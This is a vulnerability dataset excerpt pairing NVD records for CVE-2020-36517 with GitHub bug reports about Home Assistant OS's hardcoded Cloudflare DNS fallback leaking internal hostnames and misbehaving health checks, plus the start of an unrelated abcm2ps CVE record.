"Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/54" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/6" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/64" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/70" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/55" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/56" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/58" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/59" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/20" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/22" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/50" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/51" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/53" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/54" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/64" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/70" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/55" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/56" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/58" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/59" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:home-assistant:home-assistant:2022.03:*:*:*:*:*:*:*", "matchCriteriaId": "08694ACE-E7A9-4840-A2D2-851527D6DEDF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "203" ]
203
https://github.com/home-assistant/plugin-dns/issues/6
[ "Exploit", "Third Party Advisory" ]
github.com
[ "home-assistant", "plugin-dns" ]
**HassOS release with the issue:** - Frontend -> Configuration -> Info ``` arch x86_64 chassis vm dev false docker true docker_version 19.03.11 hassio true host_os HassOS 4.13 installation_type Home Assistant OS os_name Linux os_version 5.4.63 python_version 3.8.5 supervisor 247 timezone Europe/Brussels version 0.115.6 virtualenv false ``` - Or use this command: hass --version ``` ➜ ~ hass --version zsh: command not found: hass ``` **Journal logs:** ``` Oct 09 08:11:07 homeassistant 85843c26f66f[386]: [INFO] 127.0.0.1:35481 - 43627 "A IN influx.local. udp 30 false 512" NXDOMAIN qr,rd,ra 105 0.090119317s Oct 09 08:11:07 homeassistant 85843c26f66f[386]: [INFO] 172.30.32.1:48509 - 43627 "A IN influx.local. udp 30 false 512" NXDOMAIN qr,rd,ra 105 0.091012247s Oct 09 08:11:08 homeassistant 85843c26f66f[386]: [INFO] 127.0.0.1:36749 - 57069 "A IN syncthingx.local. udp 34 false 512" NXDOMAIN qr,rd,ra 109 0.024540873s Oct 09 08:11:08 homeassistant 85843c26f66f[386]: [INFO] 172.30.32.1:38087 - 57069 "A IN syncthingx.local. udp 34 false 512" NXDOMAIN qr,rd,ra 109 0.025081218s Oct 09 08:11:08 homeassistant 85843c26f66f[386]: [INFO] 127.0.0.1:35481 - 57327 "AAAA IN syncthingx.local. udp 34 false 512" NXDOMAIN qr,rd,ra 109 0.096807474s Oct 09 08:11:08 homeassistant 85843c26f66f[386]: [INFO] 172.30.32.1:38087 - 57327 "AAAA IN syncthingx.local. udp 34 false 512" NXDOMAIN qr,rd,ra 109 0.097437652s ``` **Description of problem:** **_TLDR : After some time (X hours) , HA stops using the user-defined DNS server, thus no longer being able to resolve hosts on the LAN._** HA is configured to use a local DNS server : ``` ➜ ~ ha dns info host: 172.30.32.3 locals: - dns://192.168.11.2 servers: - dns://192.168.11.2 version: "9" version_latest: "9" ➜ ~ ``` Trying to resolve a local host fails : ``` ➜ ~ nslookup influx.local Server: 172.30.32.3 Address: 172.30.32.3#53 ** server can't find influx.local: NXDOMAIN ``` On the DNS server side, the logs show no request arriving for that lookup. _Forcing_ the lookup to use the specific DNS server works : ``` ➜ ~ nslookup influx.local 192.168.11.2 Server: 192.168.11.2 Address: 192.168.11.2#53 Name: influx.local Address: 192.168.11.134 ``` And in this case, the DNS logging indeed confirms name resolution : ``` Oct 9 08:21:20 dnsmasq[344]: query[A] influx.local from 192.168.11.5 Oct 9 08:21:20 dnsmasq[344]: query[AAAA] influx.local from 192.168.11.5 ``` ### Doing the same on the HassOS host works without ant kind of issue : ``` # nslookup influx.local Server: 192.168.11.2 Address: 192.168.11.2:53 Name: influx.local Address: 192.168.11.134 Non-authoritative answer: # ``` ### Additional info : - Doing a `ha dns restart` solves the issue, for a while (X hours), but it always returns to being broken. - I migrated to HassOS a month or 2 ago, previously been running Hassio for a few years. - In a Hassio setup, this issue _never_ happened. - HassOS based setup has had this from my first install. - Pleading for help on Discord yielded very little response, no useful response at all. - Others are having the same issue, and are also being ignored : https://community.home-assistant.io/t/local-dns/178108
DNS server settings ignored for resolving lan hosts.
https://api.github.com/repos/home-assistant/plugin-dns/issues/6/comments
6
2020-10-09T08:33:09Z
2020-11-14T10:50:28Z
https://github.com/home-assistant/plugin-dns/issues/6
719,313,704
6
3,307
CVE-2020-36517
2022-03-10T17:41:21.183
An information leak in Nabu Casa Home Assistant Operating System and Home Assistant Supervised 2022.03 allows a DNS operator to gain knowledge about internal network resources via the hardcoded DNS resolver configuration.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/17" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/20" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/22" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/50" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/51" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/53" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/54" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/6" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/64" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/70" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/55" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/56" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/58" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/59" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/20" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/22" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/50" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/51" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/53" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/54" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/64" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/70" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/55" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/56" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/58" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/59" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:home-assistant:home-assistant:2022.03:*:*:*:*:*:*:*", "matchCriteriaId": "08694ACE-E7A9-4840-A2D2-851527D6DEDF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "203" ]
203
https://github.com/home-assistant/plugin-dns/issues/64
[ "Exploit", "Third Party Advisory" ]
github.com
[ "home-assistant", "plugin-dns" ]
CoreDNS is configured to healthcheck the Cloudflare fallback every 5 minutes, however in practice, a check is performed once a minute (and retries are generated when it fails). The `fallback` directive also causes healthchecks at startup, which can create substantial query rates. This is also why users have reported seeing small packet storms when Cloudflare is not reachable (by @lialosiu [here](https://github.com/home-assistant/plugin-dns/issues/20#issuecomment-917354758) and @tescophil [here](https://github.com/home-assistant/plugin-dns/pull/56#issuecomment-928967969)). The intended behaviour appears to be to check once every 5 minutes ``` forward . tls://1.1.1.1 tls://1.0.0.1 { tls_servername cloudflare-dns.com except local.hass.io health_check 5m } ``` However, that is not the only check being performed, because the encompassing server block is referenced elsewhere ``` forward . {{ join " " .servers }} {{ if len .locals | eq 0 }}dns://127.0.0.11{{ else }}{{ join " " .locals }}{{ end }} dns://127.0.0.1:5553 { except local.hass.io policy sequential health_check 1m } ``` A check will be run once a minute against `127.0.0.1:5553` as well as the locals (if present) - from further testing it _appears_ those will only begin once you've had an initial failure which leads `coredns` to move onto the next forward host. We can see this is the case by enabling coredns' prometheus endpoints and pointing telegraf at them ![Screenshot_20211106_150804](https://user-images.githubusercontent.com/2900301/140615827-5ef365e7-7925-4213-818d-9086b5f85c99.png) That's failures per minute - each failure represents a single query (where healthchecks are concerned for `example.org`) sent to `127.0.0.1:5553`. However, to `127.0.0.1:5553` (and any other upstream for that matter) it's just another query, so when it's query to it's upstream (one of `1.1.1.1` or `1.0.0.1`) fails, it retries and we end up with new packets hitting the wire, one after the other. <del> In terms of the fix, it's not clear *why* the fallback behaviour is implemented/hardcoded in the first place (I couldn't find any architecture discussions on it in that repo, perhaps I missed them), but the correct way to have implemented this would be one of the following options Option 1: not include `127.0.0.1:5553` in the forwards statement at all (as it's handled by the fallback). ``` forward . {{ join " " .servers }} {{ if len .locals | eq 0 }}dns://127.0.0.11{{ else }}{{ join " " .locals }}{{ end }} { except local.hass.io policy sequential health_check 1m } fallback REFUSED,SERVFAIL,NXDOMAIN . dns://127.0.0.1:5553 ``` (It'd need some logic to handle empty locals) Option 2: Not use a separate server block ``` forward . {{ join " " .servers }} {{ if len .locals | eq 0 }}dns://127.0.0.11{{ else }}{{ join " " .locals }}{{ end }} tls://1.1.1.1 tls://1.0.0.1 { except local.hass.io policy sequential health_check 1m tls_servername cloudflare-dns.com } fallback REFUSED,SERVFAIL,NXDOMAIN . dns://127.0.0.1:5553 ``` (perhaps there some other reason an entire separate server block was stood up, but I don't see any reference to it). - You could also add some config to handle `example.org` locally (so the healthcheck against `:5553` isn't passed upstream), but that's more horrid than the current setup. - Turning off healthchecks against the locals is likely to be undesirable due to then having to wait for `coredns`'s timeouts if a local does go down, so I've not included that The reason this isn't a PR is because it's blocked by a decision on approach. </del> Correction: The much bigger issue is actually the `fallback` statement, see https://github.com/home-assistant/plugin-dns/issues/64#issuecomment-963524772 ### Additional Observations Whilst capturing telemetry there were a few things I noticed which might help inform a decision on the above When in use, the Cloudflare fallback introduces a significant level of latency: ![Screenshot_20211106_145548](https://user-images.githubusercontent.com/2900301/140616462-5ced84d4-92c7-4917-ade6-fe75b651d734.png) At the network level, Cloudflare is only 10-15ms away, but the average query duration for CF upstreams is half a second. The presumption is that's due to DoT overheads, but unfortunately `coredns` doesn't currently expose metrics that can help verify this. I'd posit therefore that as well as fixing the healthcheck issue - The choice to have cloudflare enabled/disabled should be available to the user - If mandatory, the choice to use DoT should be open to the user But, realistically, if this issue is fixed so that healthchecks aren't amplified onto the network, then users who want to block CF DoT at the perimeter will be able to do so without HA gradually attempting to flood the network. I like `coredns`, but it does feel rather out of place in an appliance - it's approach to dynamic timeouts isn't really very well tuned to the foibles of domestic connections/networks.
CoreDNS is misconfigured leading to unexpected healthcheck behaviour
https://api.github.com/repos/home-assistant/plugin-dns/issues/64/comments
11
2021-11-06T16:24:00Z
2022-04-25T16:21:40Z
https://github.com/home-assistant/plugin-dns/issues/64
1,046,544,256
64
3,308
CVE-2020-36517
2022-03-10T17:41:21.183
An information leak in Nabu Casa Home Assistant Operating System and Home Assistant Supervised 2022.03 allows a DNS operator to gain knowledge about internal network resources via the hardcoded DNS resolver configuration.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/17" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/20" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/22" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/50" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/51" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/53" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/54" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/6" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/64" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/70" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/55" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/56" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/58" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/59" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://community.home-assistant.io/t/ha-os-dns-setting-configuration-not-respected/356572" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/20" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/22" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/50" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/51" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/53" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/54" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/64" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/issues/70" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/55" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/56" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/58" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/home-assistant/plugin-dns/pull/59" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:home-assistant:home-assistant:2022.03:*:*:*:*:*:*:*", "matchCriteriaId": "08694ACE-E7A9-4840-A2D2-851527D6DEDF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "203" ]
203
https://github.com/home-assistant/plugin-dns/issues/70
[ "Exploit", "Third Party Advisory" ]
github.com
[ "home-assistant", "plugin-dns" ]
### Describe the issue you are experiencing Home Assistant OS always gets configured to load-balance between my DNS resolver and Cloudflare's. I already looked under every stone, but there's no way to disable this behavior using configuration options. So if I use DNS names configured by my router instead of hard-coding IP addresses, HA will switch over to Cloudflare from time to time and leak my internal hostnames to their service. Of course resolution fails in this case, too. Note that this is not caused by the hard-coded fallback option, but by the hard-coded load-balancing option. One way to avoid this could be blocking 1.1.1.1 and 1.0.0.1 in my firewall, but then HA's DNS resolver goes berserk flooding my firewall logs with multiple connection attempts per second. Also, this will break further whenever developers decide to switch their user base from Cloudflare to a new data collection service. ### What operating system image do you use? ova (for Virtual Machines) ### What version of Home Assistant Operating System is installed? 7.1 ### Did you upgrade the Operating System. Yes ### Steps to reproduce the issue 1. Insert local hostname in HA config 2. Notice recurring failures in name resolution 3. Notice packets going to 1.0.0.1 and 1.1.1.1 ### Anything in the Supervisor logs that might be useful for us? ```txt - ``` ### Anything in the Host logs that might be useful for us? ```txt Typical output of `ha dns log` when the service gets blocked. ~~~ [INFO] 127.0.0.1:44130 - 10230 "NS IN . udp 17 false 512" NOERROR - 0 30.001023101s [ERROR] plugin/errors: 2 . NS: dial tcp 1.1.1.1:853: i/o timeout [INFO] 127.0.0.1:51517 - 36166 "NS IN . udp 17 false 512" NOERROR - 0 30.000661016s [ERROR] plugin/errors: 2 . NS: dial tcp 1.0.0.1:853: i/o timeout [INFO] 127.0.0.1:34985 - 13557 "NS IN . udp 17 false 512" NOERROR - 0 30.001216215s [ERROR] plugin/errors: 2 . NS: dial tcp 1.0.0.1:853: i/o timeout [INFO] 127.0.0.1:39902 - 40031 "NS IN . udp 17 false 512" NOERROR - 0 30.000821668s [ERROR] plugin/errors: 2 . NS: dial tcp 1.1.1.1:853: i/o timeout [INFO] 127.0.0.1:43380 - 37784 "NS IN . udp 17 false 512" NOERROR - 0 30.000649803s [ERROR] plugin/errors: 2 . NS: dial tcp 1.0.0.1:853: i/o timeout [INFO] 127.0.0.1:60231 - 1526 "NS IN . udp 17 false 512" NOERROR - 0 30.000941436s [ERROR] plugin/errors: 2 . NS: dial tcp 1.0.0.1:853: i/o timeout [INFO] 127.0.0.1:42409 - 17159 "NS IN . udp 17 false 512" NOERROR - 0 30.001298402s [ERROR] plugin/errors: 2 . NS: dial tcp 1.1.1.1:853: i/o timeout [INFO] 127.0.0.1:37011 - 7485 "NS IN . udp 17 false 512" NOERROR - 0 30.00056859s [ERROR] plugin/errors: 2 . NS: dial tcp 1.0.0.1:853: i/o timeout [INFO] 127.0.0.1:46069 - 34633 "NS IN . udp 17 false 512" NOERROR - 0 30.001109111s [ERROR] plugin/errors: 2 . NS: dial tcp 1.0.0.1:853: i/o timeout [INFO] 127.0.0.1:52199 - 55341 "NS IN . udp 17 false 512" NOERROR - 0 30.000769912s [ERROR] plugin/errors: 2 . NS: dial tcp 1.0.0.1:853: i/o timeout [INFO] 127.0.0.1:44575 - 61374 "NS IN . udp 17 false 512" NOERROR - 0 30.000521003s [ERROR] plugin/errors: 2 . NS: dial tcp 1.1.1.1:853: i/o timeout [INFO] 127.0.0.1:59716 - 56622 "NS IN . udp 17 false 512" NOERROR - 0 30.001314379s [ERROR] plugin/errors: 2 . NS: dial tcp 1.0.0.1:853: i/o timeout [INFO] 127.0.0.1:43202 - 11517 "NS IN . udp 17 false 512" NOERROR - 0 30.000960835s [ERROR] plugin/errors: 2 . NS: dial tcp 1.1.1.1:853: i/o timeout ~~~ ``` ### System Health information _No response_ ### Additional information _No response_
Home Assistant OS leaks private host names to cloudflare DNS service (CVE-2020-36517)
https://api.github.com/repos/home-assistant/plugin-dns/issues/70/comments
13
2022-01-15T15:35:56Z
2023-12-11T05:21:43Z
https://github.com/home-assistant/plugin-dns/issues/70
1,104,812,559
70
3,309
CVE-2021-32434
2022-03-10T17:42:14.277
abcm2ps v8.14.11 was discovered to contain an out-of-bounds read in the function calculate_beam at draw.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
